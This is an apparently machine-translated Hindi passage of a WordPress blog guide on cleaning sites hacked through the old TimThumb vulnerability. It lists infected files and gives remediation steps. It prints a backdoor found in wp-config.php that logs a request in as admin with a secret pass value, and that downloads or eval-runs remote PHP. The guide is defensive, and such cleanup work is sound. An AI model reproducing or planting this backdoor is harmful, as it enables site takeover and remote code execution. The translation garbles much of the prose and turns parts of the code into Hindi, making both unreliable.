तो अगर आपको सही याद है, तो अगस्त में टिमटूम्प स्क्रिप्ट के साथ एक सुरक्षा समस्या थी जो तय हो गई थी। हालांकि अभी भी हमारे आश्चर्य की बात है, कई साइट अभी भी पुराने संस्करण का उपयोग कर रहे हैं। हमने पिछले महीने में अभी तक तीन साइट तय की है, एक कल हो रहा है। इसलिए यह केवल चरण लेख से एक कदम लिखने के लिए समझ में आता है, इसलिए हमारे उपयोगकर्ता इसका पालन कर सकते हैं। उन सभी तीन उपयोगकर्ताओं के लिए जो हम इस समस्या को ठीक करते हैं, यह भी पता नहीं था कि टिमटूम् क्या था या वे इसका उपयोग कर रहे थे या नहीं
TimThumb एक PHP स्क्रिप्ट है जो छवियों का आकार बदलती है। इसमें एक भेद्यता थी, लेकिन अब इसका उपयोग करने के लिए सुरक्षित है
तो आप कैसे जानते हैं कि आपकी साइट हैक की गई है? यदि आप अपनी साइट पर जाकर अपने ब्राउज़र पर एक बड़ी लाल स्क्रीन देखते हैं:
यदि आप अपनी साइट से पुनर्निर्देशित होने वाले उपयोगकर्ताओं के ईमेल के साथ बमबारी करना शुरू करते हैं सबसे अधिक संभावना है, यह मामला यह है कि आपकी साइट इस शोषण का शिकार थी।
समर्थक उपाय के रूप में, सभी को केवल इस Timthumb Vulnerability Scanner का उपयोग करना चाहिए। यह आपको बताएगा कि क्या आप टिमटूम्ब के पुराने संस्करण का उपयोग कर रहे हैं बहुत सारे थीम क्लब ने अपने मूल को तुरंत उन्नत कर दिया। तो यह प्लगइन जांच करेगा कि क्या टिमथंब का नया सुरक्षित संस्करण स्थापित है या कोई पुराना संस्करण स्थापित है या नहीं।
अब अगर आपकी साइट पहले से ही इस टीमथंब के शिकार का शिकार हो गई है, तो यहां आपको क्या करना है।
पहले आपको निम्न फ़ाइलों को हटाने की आवश्यकता है:
/wp-admin/upd.php /wp-content/upd.php
वर्डप्रेस एडमिन पैनल में लॉग इन करें और अपने वर्डप्रेस वर्जन को पुनर्स्थापित करें। हम विशेष रूप से इन फ़ाइलों को पुनर्स्थापित करने के लिए देख रहे हैं:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
फिर अपने खोलें WP-config.php जहां आपको सबसे बड़ा मैलवेयर कोड मिल जाएगा, जो लॉग इन क्रेडेंशियल्स और कुकीज का संग्रह कर रहे हैं। यह कोड नीचे की ओर होगा
अगर (isset ($ _GET ['पिंगनो']) && isset ($ _GET ['pass'])) {
यदि ($ _GET ['पास'] == '1 9का 14 9 7 9 8 9 8 8 8 8 8 8) ईटीबी 13 डी 5 85 ए 4 सी 22'
अगर ($ _GET ['पिंगनो'] == 'लॉगिन') {
$ user_login = 'admin';
$ user = get_userdatabylogin ($ user_login);
$ user_id = $ user-> आईडी;
wp_set_current_user ($ user_id, $ user_login);
wp_set_auth_cookie ($ user_id);
do_action ('wp_login', $ user_login);
}
अगर (($ _GET ['पिंगनो'] == 'एप') && (एज़ेट ($ _ GET ['फ़ाइल'])) {
$ ch = curl_init ($ _GET ['फ़ाइल']);
$ एफएनएम = एमडी 5 (रैंड (0, 100))। '। php';
$ एफपी = एफओपीएन ($ एफएनएम, "डब्ल्यू");
curl_setopt ($ ch, CURLOPT_FILE, $ fp);
curl_setopt ($ CH, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
curl_exec ($ ch);
curl_close ($ ch);
fclose ($ एफपी);
गूंज "";
}
अगर (($ _GET ['पिंगनो'] == 'एवल') && (एज़ैट ($ _ GET ['फ़ाइल'])) {
$ ch = curl_init ($ _GET ['फ़ाइल']);
curl_setopt ($ CH, CURLOPT_RETURNTRANSFER, सच);
curl_setopt ($ CH, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
$ पुनः = कर्ल_एक्सएसी ($ CH);
curl_close ($ ch);
eval ($ फिर से);
}}}
अपने विषय के फ़ोल्डर में, कहीं भी टिमटूंब स्क्रिप्ट को कैश्ड फाइलों को संग्रहीत कर सकते हैं। आमतौर पर वे इस संरचना में हैं:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
ऐसा लगता है कि सब कुछ हटा दें यदि आप चीजों के बारे में निश्चित नहीं हैं, तो सब कुछ हटाएं जो एक छवि फ़ाइल नहीं है।
आप जिस चीज़ को करना चाहते हैं, वह नवीनतम संस्करण के साथ timthumb.php की जगह है, जो http://timthumb.googlecode.com/svn/trunk/timthumb.php पर पाया जा सकता है
अब यह एक अच्छा विचार होगा कि आपके पासवर्ड को आपकी WordPress लॉगिन जानकारी में आपकी MySQL लॉगिन जानकारी से शुरू होकर बदलना होगा। Wp-config.php में MySQL के लिए पासवर्ड बदलने के लिए मत भूलना या आपको “कनेक्शन स्थापित करने में त्रुटि” स्क्रीन मिलेगी।
अपने wp-config.php फ़ाइल में गुप्त कुंजियां बदलें। आप ऑनलाइन जनरेटर पर जाकर एक नई कुंजी उत्पन्न कर सकते हैं।
अब आप कर रहे हैं। सभी पेज कैशिंग प्लगइन्स खाली करने के लिए मत भूलना सावधानीपूर्वक उपाय के रूप में, आपके ब्राउज़र कैश और कुकीज़ को भी साफ़ करना अच्छा है।
डेवलपर्स के लिए, टिमथम्ब फ़ंक्शनलिटी को बदलने के लिए वर्डप्रेस में अतिरिक्त छवि आकार सुविधा का उपयोग करने का प्रयास करें
हमें बताएं कि हमें हमारे संपर्क फ़ॉर्म का उपयोग करके और सहायता की आवश्यकता है।